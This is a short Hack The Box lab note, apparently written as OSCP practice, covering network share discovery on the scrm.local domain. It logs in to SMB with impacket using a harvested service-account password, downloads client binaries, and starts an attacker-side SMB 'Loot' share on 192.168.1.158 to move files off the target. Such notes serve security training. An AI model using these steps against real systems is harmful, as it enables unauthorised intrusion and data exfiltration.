Vonnie Hudson How To Hack The Box To Your OSCP (The Bonus Boxes) ================================ DISCOVERY -------------------------------- # MITRE ATT&CK T1135 Discovery: Network Share Discovery cd C:\\Shares\\IT\\Apps\\Sales Order Client dir sudo python3 /opt/impacket/examples/smbclient.py -no-pass -k scrm.local/MiscSvc:ScrambledEggs9900@dc1.scrm.local shares use IT get Apps\Sales Order Client\ScrambleClient.exe get Apps\Sales Order Client\Scramblelib.dll file ScrambleClient.exe Scramblelib.dll sudo smbserver.py -smb2support -username vonnie -password Password-123! Loot . \\192.168.1.158\Loot